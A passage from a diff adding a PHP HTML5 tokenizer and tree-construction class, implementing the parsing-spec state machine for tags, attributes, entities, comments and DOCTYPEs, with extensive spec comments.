reconsume the current input character in the data state. */ + $this->emitToken(array( + 'type' => self::CHARACTR, + 'data' => '<' + )); + + $this->char--; + $this->state = 'data'; + } + break; + } + } + + private function closeTagOpenState() { + $next_node = strtolower($this->characters('A-Za-z', $this->char + 1)); + $the_same = count($this->tree->stack) > 0 && $next_node === end($this->tree->stack)->nodeName; + + if(($this->content_model === self::RCDATA || $this->content_model === self::CDATA) && + (!$the_same || ($the_same && (!preg_match('/[\t\n\x0b\x0c >\/]/', + $this->character($this->char + 1 + strlen($next_node))) || $this->EOF === $this->char)))) { + /* If the content model flag is set to the RCDATA or CDATA states then + examine the next few characters. If they do not match the tag name of + the last start tag token emitted (case insensitively), or if they do but + they are not immediately followed by one of the following characters: + * U+0009 CHARACTER TABULATION + * U+000A LINE FEED (LF) + * U+000B LINE TABULATION + * U+000C FORM FEED (FF) + * U+0020 SPACE + * U+003E GREATER-THAN SIGN (>) + * U+002F SOLIDUS (/) + * EOF + ...then there is a parse error. Emit a U+003C LESS-THAN SIGN character + token, a U+002F SOLIDUS character token, and switch to the data state + to process the next input character. */ + $this->emitToken(array( + 'type' => self::CHARACTR, + 'data' => '</' + )); + + $this->state = 'data'; + + } else { + /* Otherwise, if the content model flag is set to the PCDATA state, + or if the next few characters do match that tag name, consume the + next input character: */ + $this->char++; + $char = $this->char(); + + if(preg_match('/^[A-Za-z]$/', $char)) { + /* U+0041 LATIN LETTER A through to U+005A LATIN LETTER Z + Create a new end tag token, set its tag name to the lowercase version + of the input character (add 0x0020 to the character's code point), then + switch to the tag name state. (Don't emit the token yet; further details + will be filled in before it is emitted.) */ + $this->token = array( + 'name' => strtolower($char), + 'type' => self::ENDTAG + ); + + $this->state = 'tagName'; + + } elseif($char === '>') { + /* U+003E GREATER-THAN SIGN (>) + Parse error. Switch to the data state. */ + $this->state = 'data'; + + } elseif($this->char === $this->EOF) { + /* EOF + Parse error. Emit a U+003C LESS-THAN SIGN character token and a U+002F + SOLIDUS character token. Reconsume the EOF character in the data state. */ + $this->emitToken(array( + 'type' => self::CHARACTR, + 'data' => '</' + )); + + $this->char--; + $this->state = 'data'; + + } else { + /* Parse error. Switch to the bogus comment state. */ + $this->state = 'bogusComment'; + } + } + } + + private function tagNameState() { + // Consume the next input character: + $this->char++; + $char = $this->character($this->char); + + if(preg_match('/^[\t\n\x0b\x0c ]$/', $char)) { + /* U+0009 CHARACTER TABULATION + U+000A LINE FEED (LF) + U+000B LINE TABULATION + U+000C FORM FEED (FF) + U+0020 SPACE + Switch to the before attribute name state. */ + $this->state = 'beforeAttributeName'; + + } elseif($char === '>') { + /* U+003E GREATER-THAN SIGN (>) + Emit the current tag token. Switch to the data state. */ + $this->emitToken($this->token); + $this->state = 'data'; + + } elseif($this->char === $this->EOF) { + /* EOF + Parse error. Emit the current tag token. Reconsume the EOF + character in the data state. */ + $this->emitToken($this->token); + + $this->char--; + $this->state = 'data'; + + } elseif($char === '/') { + /* U+002F SOLIDUS (/) + Parse error unless this is a permitted slash. Switch to the before + attribute name state. */ + $this->state = 'beforeAttributeName'; + + } else { + /* Anything else + Append the current input character to the current tag token's tag name. + Stay in the tag name state. */ + $this->token['name'] .= strtolower($char); + $this->state = 'tagName'; + } + } + + private function beforeAttributeNameState() { + // Consume the next input character: + $this->char++; + $char = $this->character($this->char); + + if(preg_match('/^[\t\n\x0b\x0c ]$/', $char)) { + /* U+0009 CHARACTER TABULATION + U+000A LINE FEED (LF) + U+000B LINE TABULATION + U+000C FORM FEED (FF) + U+0020 SPACE + Stay in the before attribute name state. */ + $this->state = 'beforeAttributeName'; + + } elseif($char === '>') { + /* U+003E GREATER-THAN SIGN (>) + Emit the current tag token. Switch to the data state. */ + $this->emitToken($this->token); + $this->state = 'data'; + + } elseif($char === '/') { + /* U+002F SOLIDUS (/) + Parse error unless this is a permitted slash. Stay in the before + attribute name state. */ + $this->state = 'beforeAttributeName'; + + } elseif($this->char === $this->EOF) { + /* EOF + Parse error. Emit the current tag token. Reconsume the EOF + character in the data state. */ + $this->emitToken($this->token); + + $this->char--; + $this->state = 'data'; + + } else { + /* Anything else + Start a new attribute in the current tag token. Set that attribute's + name to the current input character, and its value to the empty string. + Switch to the attribute name state. */ + $this->token['attr'][] = array( + 'name' => strtolower($char), + 'value' => null + ); + + $this->state = 'attributeName'; + } + } + + private function attributeNameState() { + // Consume the next input character: + $this->char++; + $char = $this->character($this->char); + + if(preg_match('/^[\t\n\x0b\x0c ]$/', $char)) { + /* U+0009 CHARACTER TABULATION + U+000A LINE FEED (LF) + U+000B LINE TABULATION + U+000C FORM FEED (FF) + U+0020 SPACE + Stay in the before attribute name state. */ + $this->state = 'afterAttributeName'; + + } elseif($char === '=') { + /* U+003D EQUALS SIGN (=) + Switch to the before attribute value state. */ + $this->state = 'beforeAttributeValue'; + + } elseif($char === '>') { + /* U+003E GREATER-THAN SIGN (>) + Emit the current tag token. Switch to the data state. */ + $this->emitToken($this->token); + $this->state = 'data'; + + } elseif($char === '/' && $this->character($this->char + 1) !== '>') { + /* U+002F SOLIDUS (/) + Parse error unless this is a permitted slash. Switch to the before + attribute name state. */ + $this->state = 'beforeAttributeName'; + + } elseif($this->char === $this->EOF) { + /* EOF + Parse error. Emit the current tag token. Reconsume the EOF + character in the data state. */ + $this->emitToken($this->token); + + $this->char--; + $this->state = 'data'; + + } else { + /* Anything else + Append the current input character to the current attribute's name. + Stay in the attribute name state. */ + $last = count($this->token['attr']) - 1; + $this->token['attr'][$last]['name'] .= strtolower($char); + + $this->state = 'attributeName'; + } + } + + private function afterAttributeNameState() { + // Consume the next input character: + $this->char++; + $char = $this->character($this->char); + + if(preg_match('/^[\t\n\x0b\x0c ]$/', $char)) { + /* U+0009 CHARACTER TABULATION + U+000A LINE FEED (LF) + U+000B LINE TABULATION + U+000C FORM FEED (FF) + U+0020 SPACE + Stay in the after attribute name state. */ + $this->state = 'afterAttributeName'; + + } elseif($char === '=') { + /* U+003D EQUALS SIGN (=) + Switch to the before attribute value state. */ + $this->state = 'beforeAttributeValue'; + + } elseif($char === '>') { + /* U+003E GREATER-THAN SIGN (>) + Emit the current tag token. Switch to the data state. */ + $this->emitToken($this->token); + $this->state = 'data'; + + } elseif($char === '/' && $this->character($this->char + 1) !== '>') { + /* U+002F SOLIDUS (/) + Parse error unless this is a permitted slash. Switch to the + before attribute name state. */ + $this->state = 'beforeAttributeName'; + + } elseif($this->char === $this->EOF) { + /* EOF + Parse error. Emit the current tag token. Reconsume the EOF + character in the data state. */ + $this->emitToken($this->token); + + $this->char--; + $this->state = 'data'; + + } else { + /* Anything else + Start a new attribute in the current tag token. Set that attribute's + name to the current input character, and its value to the empty string. + Switch to the attribute name state. */ + $this->token['attr'][] = array( + 'name' => strtolower($char), + 'value' => null + ); + + $this->state = 'attributeName'; + } + } + + private function beforeAttributeValueState() { + // Consume the next input character: + $this->char++; + $char = $this->character($this->char); + + if(preg_match('/^[\t\n\x0b\x0c ]$/', $char)) { + /* U+0009 CHARACTER TABULATION + U+000A LINE FEED (LF) + U+000B LINE TABULATION + U+000C FORM FEED (FF) + U+0020 SPACE + Stay in the before attribute value state. */ + $this->state = 'beforeAttributeValue'; + + } elseif($char === '"') { + /* U+0022 QUOTATION MARK (") + Switch to the attribute value (double-quoted) state. */ + $this->state = 'attributeValueDoubleQuoted'; + + } elseif($char === '&') { + /* U+0026 AMPERSAND (&) + Switch to the attribute value (unquoted) state and reconsume + this input character. */ + $this->char--; + $this->state = 'attributeValueUnquoted'; + + } elseif($char === '\'') { + /* U+0027 APOSTROPHE (') + Switch to the attribute value (single-quoted) state. */ + $this->state = 'attributeValueSingleQuoted'; + + } elseif($char === '>') { + /* U+003E GREATER-THAN SIGN (>) + Emit the current tag token. Switch to the data state. */ + $this->emitToken($this->token); + $this->state = 'data'; + + } else { + /* Anything else + Append the current input character to the current attribute's value. + Switch to the attribute value (unquoted) state. */ + $last = count($this->token['attr']) - 1; + $this->token['attr'][$last]['value'] .= $char; + + $this->state = 'attributeValueUnquoted'; + } + } + + private function attributeValueDoubleQuotedState() { + // Consume the next input character: + $this->char++; + $char = $this->character($this->char); + + if($char === '"') { + /* U+0022 QUOTATION MARK (") + Switch to the before attribute name state. */ + $this->state = 'beforeAttributeName'; + + } elseif($char === '&') { + /* U+0026 AMPERSAND (&) + Switch to the entity in attribute value state. */ + $this->entityInAttributeValueState('double'); + + } elseif($this->char === $this->EOF) { + /* EOF + Parse error. Emit the current tag token. Reconsume the character + in the data state. */ + $this->emitToken($this->token); + + $this->char--; + $this->state = 'data'; + + } else { + /* Anything else + Append the current input character to the current attribute's value. + Stay in the attribute value (double-quoted) state. */ + $last = count($this->token['attr']) - 1; + $this->token['attr'][$last]['value'] .= $char; + + $this->state = 'attributeValueDoubleQuoted'; + } + } + + private function attributeValueSingleQuotedState() { + // Consume the next input character: + $this->char++; + $char = $this->character($this->char); + + if($char === '\'') { + /* U+0022 QUOTATION MARK (') + Switch to the before attribute name state. */ + $this->state = 'beforeAttributeName'; + + } elseif($char === '&') { + /* U+0026 AMPERSAND (&) + Switch to the entity in attribute value state. */ + $this->entityInAttributeValueState('single'); + + } elseif($this->char === $this->EOF) { + /* EOF + Parse error. Emit the current tag token. Reconsume the character + in the data state. */ + $this->emitToken($this->token); + + $this->char--; + $this->state = 'data'; + + } else { + /* Anything else + Append the current input character to the current attribute's value. + Stay in the attribute value (single-quoted) state. */ + $last = count($this->token['attr']) - 1; + $this->token['attr'][$last]['value'] .= $char; + + $this->state = 'attributeValueSingleQuoted'; + } + } + + private function attributeValueUnquotedState() { + // Consume the next input character: + $this->char++; + $char = $this->character($this->char); + + if(preg_match('/^[\t\n\x0b\x0c ]$/', $char)) { + /* U+0009 CHARACTER TABULATION + U+000A LINE FEED (LF) + U+000B LINE TABULATION + U+000C FORM FEED (FF) + U+0020 SPACE + Switch to the before attribute name state. */ + $this->state = 'beforeAttributeName'; + + } elseif($char === '&') { + /* U+0026 AMPERSAND (&) + Switch to the entity in attribute value state. */ + $this->entityInAttributeValueState('non'); + + } elseif($char === '>') { + /* U+003E GREATER-THAN SIGN (>) + Emit the current tag token. Switch to the data state. */ + $this->emitToken($this->token); + $this->state = 'data'; + + } else { + /* Anything else + Append the current input character to the current attribute's value. + Stay in the attribute value (unquoted) state. */ + $last = count($this->token['attr']) - 1; + $this->token['attr'][$last]['value'] .= $char; + + $this->state = 'attributeValueUnquoted'; + } + } + + private function entityInAttributeValueState() { + // Attempt to consume an entity. + $entity = $this->entity(); + + // If nothing is returned, append a U+0026 AMPERSAND character to the + // current attribute's value. Otherwise, emit the character token that + // was returned. + $char = (!$entity) + ? '&' + : $entity; + + $this->emitToken($char); + } + + private function bogusCommentState() { + /* Consume every character up to the first U+003E GREATER-THAN SIGN + character (>) or the end of the file (EOF), whichever comes first. Emit + a comment token whose data is the concatenation of all the characters + starting from and including the character that caused the state machine + to switch into the bogus comment state, up to and including the last + consumed character before the U+003E character, if any, or up to the + end of the file otherwise. (If the comment was started by the end of + the file (EOF), the token is empty.) */ + $data = $this->characters('^>', $this->char); + $this->emitToken(array( + 'data' => $data, + 'type' => self::COMMENT + )); + + $this->char += strlen($data); + + /* Switch to the data state. */ + $this->state = 'data'; + + /* If the end of the file was reached, reconsume the EOF character. */ + if($this->char === $this->EOF) { + $this->char = $this->EOF - 1; + } + } + + private function markupDeclarationOpenState() { + /* If the next two characters are both U+002D HYPHEN-MINUS (-) + characters, consume those two characters, create a comment token whose + data is the empty string, and switch to the comment state. */ + if($this->character($this->char + 1, 2) === '--') { + $this->char += 2; + $this->state = 'comment'; + $this->token = array( + 'data' => null, + 'type' => self::COMMENT + ); + + /* Otherwise if the next seven chacacters are a case-insensitive match + for the word "DOCTYPE", then consume those characters and switch to the + DOCTYPE state. */ + } elseif(strtolower($this->character($this->char + 1, 7)) === 'doctype') { + $this->char += 7; + $this->state = 'doctype'; + + /* Otherwise, is is a parse error. Switch to the bogus comment state. + The next character that is consumed, if any, is the first character + that will be in the comment. */ + } else { + $this->char++; + $this->state = 'bogusComment'; + } + } + + private function commentState() { + /* Consume the next input character: */ + $this->char++; + $char = $this->char(); + + /* U+002D HYPHEN-MINUS (-) */ + if($char === '-') { + /* Switch to the comment dash state */ + $this->state = 'commentDash'; + + /* EOF */ + } elseif($this->char === $this->EOF) { + /* Parse error. Emit the comment token. Reconsume the EOF character + in the data state. */ + $this->emitToken($this->token); + $this->char--; + $this->state = 'data'; + + /* Anything else */ + } else { + /* Append the input character to the comment token's data. Stay in + the comment state. */ + $this->token['data'] .= $char; + } + } + + private function commentDashState() { + /* Consume the next input character: */ + $this->char++; + $char = $this->char(); + + /* U+002D HYPHEN-MINUS (-) */ + if($char === '-') { + /* Switch to the comment end state */ + $this->state = 'commentEnd'; + + /* EOF */ + } elseif($this->char === $this->EOF) { + /* Parse error. Emit the comment token. Reconsume the EOF character + in the data state. */ + $this->emitToken($this->token); + $this->char--; + $this->state = 'data'; + + /* Anything else */ + } else { + /* Append a U+002D HYPHEN-MINUS (-) character and the input + character to the comment token's data. Switch to the comment state. */ + $this->token['data'] .= '-'.$char; + $this->state = 'comment'; + } + } + + private function commentEndState() { + /* Consume the next input character: */ + $this->char++; + $char = $this->char(); + + if($char === '>') { + $this->emitToken($this->token); + $this->state = 'data'; + + } elseif($char === '-') { + $this->token['data'] .= '-'; + + } elseif($this->char === $this->EOF) { + $this->emitToken($this->token); + $this->char--; + $this->state = 'data'; + + } else { + $this->token['data'] .= '--'.$char; + $this->state = 'comment'; + } + } + + private function doctypeState() { + /* Consume the next input character: */ + $this->char++; + $char = $this->char(); + + if(preg_match('/^[\t\n\x0b\x0c ]$/', $char)) { + $this->state = 'beforeDoctypeName'; + + } else { + $this->char--; + $this->state = 'beforeDoctypeName'; + } + } + + private function beforeDoctypeNameState() { + /* Consume the next input character: */ + $this->char++; + $char = $this->char(); + + if(preg_match('/^[\t\n\x0b\x0c ]$/', $char)) { + // Stay in the before DOCTYPE name state. + + } elseif(preg_match('/^[a-z]$/', $char)) { + $this->token = array( + 'name' => strtoupper($char), + 'type' => self::DOCTYPE, + 'error' => true + ); + + $this->state = 'doctypeName'; + + } elseif($char === '>') { + $this->emitToken(array( + 'name' => null, + 'type' => self::DOCTYPE, + 'error' => true + )); + + $this->state = 'data'; + + } elseif($this->char === $this->EOF) { + $this->emitToken(array( + 'name' => null, + 'type' => self::DOCTYPE, + 'error' => true + )); + + $this->char--; + $this->state = 'data'; + + } else { + $this->token = array( + 'name' => $char, + 'type' => self::DOCTYPE, + 'error' => true + ); + + $this->state = 'doctypeName'; + } + } + + private function doctypeNameState() { + /* Consume the next input character: */ + $this->char++; + $char = $this->char(); + + if(preg_match('/^[\t\n\x0b\x0c ]$/', $char)) { + $this->state = 'AfterDoctypeName'; + + } elseif($char === '>') { + $this->emitToken($this->token); + $this->state = 'data'; + + } elseif(preg_match('/^[a-z]$/', $char)) { + $this->token['name'] .= strtoupper($char); + + } elseif($this->char === $this->EOF) { + $this->emitToken($this->token); + $this->char--; + $this->state = 'data'; + + } else { + $this->token['name'] .= $char; + } + + $this->token['error'] = ($this->token['name'] === 'HTML') + ? false + : true; + } + + private function afterDoctypeNameState() { + /* Consume the next input character: */ + $this->char++; + $char = $this->char(); + + if(preg_match('/^[\t\n\x0b\x0c ]$/', $char)) { + // Stay in the DOCTYPE name state. + + } elseif($char === '>') { + $this->emitToken($this->token); + $this->state = 'data'; + + } elseif($this->char === $this->EOF) { + $this->emitToken($this->token); + $this->char--; + $this->state = 'data'; + + } else { + $this->token['error'] = true; + $this->state = 'bogusDoctype'; + } + } + + private function bogusDoctypeState() { + /* Consume the next input character: */ + $this->char++; + $char = $this->char(); + + if($char === '>') { + $this->emitToken($this->token); + $this->state = 'data'; + + } elseif($this->char === $this->EOF) { + $this->emitToken($this->token); + $this->char--; + $this->state = 'data'; + + } else { + // Stay in the bogus DOCTYPE state. + } + } + + private function entity() { + $start = $this->char; + + // This section defines how to consume an entity. This definition is + // used when parsing entities in text and in attributes. + + // The behaviour depends on the identity of the next character (the + // one immediately after the U+0026 AMPERSAND character): + + switch($this->character($this->char + 1)) { + // U+0023 NUMBER SIGN (#) + case '#': + + // The behaviour further depends on the character after the + // U+0023 NUMBER SIGN: + switch($this->character($this->char + 1)) { + // U+0078 LATIN SMALL LETTER X + // U+0058 LATIN CAPITAL LETTER X + case 'x': + case 'X': + // Follow the steps below, but using the range of + // characters U+0030 DIGIT ZERO through to U+0039 DIGIT + // NINE, U+0061 LATIN SMALL LETTER A through to U+0066 + // LATIN SMALL LETTER F, and U+0041 LATIN CAPITAL LETTER + // A, through to U+0046 LATIN CAPITAL LETTER F (in other + // words, 0-9, A-F, a-f). + $char = 1; + $char_class = '0-9A-Fa-f'; + break; + + // Anything else + default: + // Follow the steps below, but using the range of + // characters U+0030 DIGIT ZERO through to U+0039 DIGIT + // NINE (i.e. just 0-9). + $char = 0; + $char_class = '0-9'; + break; + } + + // Consume as many characters as match the range of characters + // given above. + $this->char++; + $e_name = $this->characters($char_class, $this->char + $char + 1); + $entity = $this->character($start, $this->char); + $cond = strlen($e_name) > 0; + + // The rest of the parsing happens bellow. + break; + + // Anything else + default: + // Consume the maximum number of characters possible, with the + // consumed characters case-sensitively matching one of the + // identifiers in the first column of the entities table. + $e_name = $this->characters('0-9A-Za-z;', $this->char + 1); + $len = strlen($e_name); + + for($c = 1; $c <= $len; $c++) { + $id = substr($e_name, 0, $c); + $this->char++; + + if(in_array($id, $this->entities)) { + $entity = $id; + break; + } + } + + $cond = isset($entity); + // The rest of the parsing happens bellow. + break; + } + + if(!$cond) { + // If no match can be made, then this is a parse error. No + // characters are consumed, and nothing is returned. + $this->char = $start; + return false; + } + + // Return a character token for the character corresponding to the + // entity name (as given by the second column of the entities table). + return html_entity_decode('&'.$entity.';', ENT_QUOTES, 'UTF-8'); + } + + private function emitToken($token) { + $emit = $this->tree->emitToken($token); + + if(is_int($emit)) { + $this->content_model = $emit; + + } elseif($token['type'] === self::ENDTAG) { + $this->content_model = self::PCDATA; + } + } + + private function EOF() { + $this->state = null; + $this->tree->emitToken(array( + 'type' => self::EOF + )); + } +} + +class HTML5TreeConstructer { + public $stack = array(); + + private $phase; + private $mode; + private $dom; + private $foster_parent = null; + private $a_formatting = array(); + + private $head_pointer = null; + private $form_pointer = null; + + private $scoping = array('button','caption','html','marquee','object','table','td','th'); + private $formatting = array('a','b','big','em','font','i','nobr','s','small','strike','strong','tt','u'); + private $special = array('address','area','base','basefont','bgsound', + 'blockquote','body','br','center','col','colgroup','dd','dir','div','dl', + 'dt','embed','fieldset','form','frame','frameset','h1','h2','h3','h4','h5', + 'h6','head','hr','iframe','image','img','input','isindex','li','link', + 'listing','menu','meta','noembed','noframes','noscript','ol','optgroup', + 'option','p','param','plaintext','pre','script','select','spacer','style', + 'tbody','textarea','tfoot','thead','title','tr','ul','wbr'); + + // The different phases. + const INIT_PHASE = 0; + const ROOT_PHASE = 1; + const MAIN_PHASE = 2; + const END_PHASE = 3; + + // The different insertion modes for the main phase. + const BEFOR_HEAD = 0; + const IN_HEAD = 1; + const AFTER_HEAD = 2; + const IN_BODY = 3; + const IN_TABLE = 4; + const IN_CAPTION = 5; + const IN_CGROUP = 6; + const IN_TBODY = 7; + const IN_ROW = 8; + const IN_CELL = 9; + const IN_SELECT = 10; + const AFTER_BODY = 11; + const IN_FRAME = 12; + const AFTR_FRAME = 13; + + // The different types of elements. + const SPECIAL = 0; + const SCOPING = 1; + const FORMATTING = 2; + const PHRASING = 3; + + const MARKER = 0; + + public function __construct() { + $this->phase = self::INIT_PHASE; + $this->mode = self::BEFOR_HEAD; + $this->dom = new DOMDocument; + + $this->dom->encoding = 'UTF-8'; + $this->dom->preserveWhiteSpace = true; + $this->dom->substituteEntities = true; + $this->dom->strictErrorChecking = false; + } + + // Process tag tokens + public function emitToken($token) { + switch($this->phase) { + case self::INIT_PHASE: return $this->initPhase($token); break; + case self::ROOT_PHASE: return $this->rootElementPhase($token); break; + case self::MAIN_PHASE: return $this->mainPhase($token); break; + case self::END_PHASE : return $this->trailingEndPhase($token); break; + } + } + + private function initPhase($token) { + /* Initially, the tree construction stage must handle each token + emitted from the tokenisation stage as follows: */ + + /* A DOCTYPE token that is marked as being in error + A comment token + A start tag token + An end tag token + A character token that is not one of one of U+0009 CHARACTER TABULATION, + U+000A LINE FEED (LF), U+000B LINE TABULATION, U+000C FORM FEED (FF), + or U+0020 SPACE + An end-of-file token */ + if((isset($token['error']) && $token['error']) || + $token['type'] === HTML5::COMMENT || + $token['type'] === HTML5::STARTTAG || + $token['type'] === HTML5::ENDTAG || + $token['type'] === HTML5::EOF || + ($token['type'] === HTML5::CHARACTR && isset($token['data']) && + !preg_match('/^[\t\n\x0b\x0c ]+$/', $token['data']))) { + /* This specification does not define how to handle this case. In + particular, user agents may ignore the entirety of this specification + altogether for such documents, and instead invoke special parse modes + with a greater emphasis on backwards compatibility. */ + + $this->phase = self::ROOT_PHASE; + return $this->rootElementPhase($token); + + /* A DOCTYPE token marked as being correct */ + } elseif(isset($token['error']) && !$token['error']) { + /* Append a DocumentType node to the Document node, with the name + attribute set to the name given in the DOCTYPE token (which will be + "HTML"), and the other attributes specific to DocumentType objects + set to null, empty lists, or the empty string as appropriate. */ + $doctype = new DOMDocumentType(null, null, 'HTML'); + + /* Then, switch to the root element phase of the tree construction + stage. */ + $this->phase = self::ROOT_PHASE; + + /* A character token that is one of one of U+0009 CHARACTER TABULATION, + U+000A LINE FEED (LF), U+000B LINE TABULATION, U+000C FORM FEED (FF), + or U+0020 SPACE */ + } elseif(isset($token['data']) && preg_match('/^[\t\n\x0b\x0c ]+$/', + $token['data'])) { + /* Append that character to the Document node. */ + $text = $this->dom->createTextNode($token['data']); + $this->dom->appendChild($text); + } + } + + private function rootElementPhase($token) { + /* After the initial phase, as each token is emitted from the tokenisation + stage, it must be processed as described in this section. */ + + /* A DOCTYPE token */ + if($token['type'] === HTML5::DOCTYPE) { + // Parse error. Ignore the token. + + /* A comment token */ + } elseif($token['type'] === HTML5::COMMENT) { + /* Append a Comment node to the Document object with the data + attribute set to the data given in the comment token. */ + $comment = $this->dom->createComment($token['data']); + $this->dom->appendChild($comment); + + /* A character token that is one of one of U+0009 CHARACTER TABULATION, + U+000A LINE FEED (LF), U+000B LINE TABULATION, U+000C FORM FEED (FF), + or U+0020 SPACE */ + } elseif($token['type'] === HTML5::CHARACTR && + preg_match('/^[\t\n\x0b\x0c ]+$/', $token['data'])) { + /* Append that character to the Document node. */ + $text = $this->dom->createTextNode($token['data']); + $this->dom->appendChild($text); + + /* A character token that is not one of U+0009 CHARACTER TABULATION, + U+000A LINE FEED (LF), U+000B LINE TABULATION, U+000C FORM FEED + (FF), or U+0020 SPACE + A start tag token + An end tag token + An end-of-file token */ + } elseif(($token['type'] === HTML5::CHARACTR && + !preg_match('/^[\t\n\x0b\x0c ]+$/', $token['data'])) || + $token['type'] === HTML5::STARTTAG || + $token['type'] === HTML5::ENDTAG || + $token['type'] === HTML5::EOF) { + /* Create an HTMLElement node with the tag name html, in the HTML + namespace. Append it to the Document object. Switch to the main + phase and reprocess the current token. */ + $html = $this->dom->createElement('html'); + $this->dom->appendChild($html); + $this->stack[] = $html; + + $this->phase = self::MAIN_PHASE; + return $this->mainPhase($token); + } + } + + private function mainPhase($token) { + /* Tokens in the main phase must be handled as follows: */ + + /* A DOCTYPE token */ + if($token['type'] === HTML5::DOCTYPE) { + // Parse error. Ignore the token. + + /* A start tag token with the tag name "html" */ + } elseif($token['type'] === HTML5::STARTTAG && $token['name'] === 'html') { + /* If this start tag token was not the first start tag token, then + it is a parse error. */ + + /* For each attribute on the token, check to see if the attribute + is already present on the top element of the stack of open elements. + If it is not, add the attribute and its corresponding value to that + element. */ + foreach($token['attr'] as $attr) { + if(!$this->stack[0]->hasAttribute($attr['name'])) { + $this->stack[0]->setAttribute($attr['name'], $attr['value']); + } + } + + /* An end-of-file token */ + } elseif($token['type'] === HTML5::EOF) { + /* Generate implied end tags. */ + $this->generateImpliedEndTags(); + + /* Anything else. */ + } else { + /* Depends on the insertion mode: */ + switch($this->mode) { + case self::BEFOR_HEAD: return $this->beforeHead($token); break; + case self::IN_HEAD: return $this->inHead($token); break; + case self::AFTER_HEAD: return $this->afterHead($token); break; + case self::IN_BODY: return $this->inBody($token); break; + case self::IN_TABLE: return $this->inTable($token); break; + case self::IN_CAPTION: return $this->inCaption($token); break; + case self::IN_CGROUP: return $this->inColumnGroup($token); break; + case self::IN_TBODY: return $this->inTableBody($token); break; + case self::IN_ROW: return $this->inRow($token); break; + case self::IN_CELL: return $this->inCell($token); break; + case self::IN_SELECT: return $this->inSelect($token); break; + case self::AFTER_BODY: return $this->afterBody($token); break; + case self::IN_FRAME: return $this->inFrameset($token); break; + case self::AFTR_FRAME: return $this->afterFrameset($token); break; + case self::END_PHASE: return $this->trailingEndPhase($token); break; + } + } + } + + private function beforeHead($token) { + /* Handle the token as follows: */ + + /* A character token that is one of one of U+0009 CHARACTER TABULATION, + U+000A LINE FEED (LF), U+000B LINE TABULATION, U+000C FORM FEED (FF), + or U+0020 SPACE */ + if($token['type'] === HTML5::CHARACTR && + preg_match('/^[\t\n\x0b\x0c ]+$/', $token['data'])) { + /* Append the character to the current node. */ + $this->insertText($token['data']); + + /* A comment token */ + } elseif($token['type'] === HTML5::COMMENT) { + /* Append a Comment node to the current node with the data attribute + set to the data given in the comment token. */ + $this->insertComment($token['data']); + + /* A start tag token with the tag name "head" */ + } elseif($token['type'] === HTML5::STARTTAG && $token['name'] === 'head') { + /* Create an element for the token, append the new element to the + current node and push it onto the stack of open elements. */ + $element = $this->insertElement($token); + + /* Set the head element pointer to this new element node. */ + $this->head_pointer = $element; + + /* Change the insertion mode to "in head". */ + $this->mode = self::IN_HEAD; + + /* A start tag token whose tag name is one of: "base", "link", "meta", + "script", "style", "title". Or an end tag with the tag name "html". + Or a character token that is not one of U+0009 CHARACTER TABULATION, + U+000A LINE FEED (LF), U+000B LINE TABULATION, U+000C FORM FEED (FF), + or U+0020 SPACE. Or any other start tag token */ + } elseif($token['type'] === HTML5::STARTTAG || + ($token['type'] === HTML5::ENDTAG && $token['name'] === 'html') || + ($token['type'] === HTML5::CHARACTR && !preg_match('/^[\t\n\x0b\x0c ]$/', + $token['data']))) { + /* Act as if a start tag token with the tag name "head" and no + attributes had been seen, then reprocess the current token. */ + $this->beforeHead(array( + 'name' => 'head', + 'type' => HTML5::STARTTAG, + 'attr' => array() + )); + + return $this->inHead($token); + + /* Any other end tag */ + } elseif($token['type'] === HTML5::ENDTAG) { + /* Parse error. Ignore the token. */ + } + } + + private function inHead($token) { + /* Handle the token as follows: */ + + /* A character token that is one of one of U+0009 CHARACTER TABULATION, + U+000A LINE FEED (LF), U+000B LINE TABULATION, U+000C FORM FEED (FF), + or U+0020 SPACE. + + THIS DIFFERS FROM THE SPEC: If the current node is either a title, style + or script element, append the character to the current node regardless + of its content. */ + if(($token['type'] === HTML5::CHARACTR && + preg_match('/^[\t\n\x0b\x0c ]+$/', $token['data'])) || ( + $token['type'] === HTML5::CHARACTR && in_array(end($this->stack)->nodeName, + array('title', 'style', 'script')))) { + /* Append the character to the current node. */ + $this->insertText($token['data']); + + /* A comment token */ + } elseif($token['type'] === HTML5::COMMENT) { + /* Append a Comment node to the current node with the data attribute + set to the data given in the comment token. */ + $this->insertComment($token['data']); + + } elseif($token['type'] === HTML5::ENDTAG && + in_array($token['name'], array('title', 'style', 'script'))) { + array_pop($this->stack); + return HTML5::PCDATA; + + /* A start tag with the tag name "title" */ + } elseif($token['type'] === HTML5::STARTTAG && $token['name'] === 'title') { + /* Create an element for the token and append the new element to the + node pointed to by the head element pointer, or, if that is null + (innerHTML case), to the current node. */ + if($this->head_pointer !== null) { + $element = $this->insertElement($token, false); + $this->head_pointer->appendChild($element); + + } else { + $element = $this->insertElement($token); + } + + /* Switch the tokeniser's content model flag to the RCDATA state. */ + return HTML5::RCDATA; + + /* A start tag with the tag name "style" */ + } elseif($token['type'] === HTML5::STARTTAG && $token['name'] === 'style') { + /* Create an element for the token and append the new element to the + node pointed to by the head element pointer, or, if that is null + (innerHTML case), to the current node. */ + if($this->head_pointer !== null) { + $element = $this->insertElement($token, false); + $this->head_pointer->appendChild($element); + + } else { + $this->insertElement($token); + } + + /* Switch the tokeniser's content model flag to the CDATA state. */ + return HTML5::CDATA; + + /* A start tag with the tag name "script" */ + } elseif($token['type'] === HTML5::STARTTAG && $token['name'] === 'script') { + /* Create an element for the token. */ + $element = $this->insertElement($token, false); + $this->head_pointer->appendChild($element); + + /* Switch the tokeniser's content model flag to the CDATA state. */ + return HTML5::CDATA; + + /* A start tag with the tag name "base", "link", or "meta" */ + } elseif($token['type'] === HTML5::STARTTAG && in_array($token['name'], + array('base', 'link', 'meta'))) { + /* Create an element for the token and append the new element to the + node pointed to by the head element pointer, or, if that is null + (innerHTML case), to the current node. */ + if($this->head_pointer !== null) { + $element = $this->insertElement($token, false); + $this->head_pointer->appendChild($element); + array_pop($this->stack); + + } else { + $this->insertElement($token); + } + + /* An end tag with the tag name "head" */ + } elseif($token['type'] === HTML5::ENDTAG && $token['name'] === 'head') { + /* If the current node is a head element, pop the current node off + the stack of open elements. */ + if($this->head_pointer->isSameNode(end($this->stack))) { + array_pop($this->stack); + + /* Otherwise, this is a parse error. */ + } else { + // k + } + + /* Change the insertion mode to "after head". */ + $this->mode = self::AFTER_HEAD; + + /* A start tag with the tag name "head" or an end tag except "html". */ + } elseif(($token['type'] === HTML5::STARTTAG && $token['name'] === 'head') || + ($token['type'] === HTML5::ENDTAG && $token['name'] !== 'html')) { + // Parse error. Ignore the token. + + /* Anything else */ + } else { + /* If 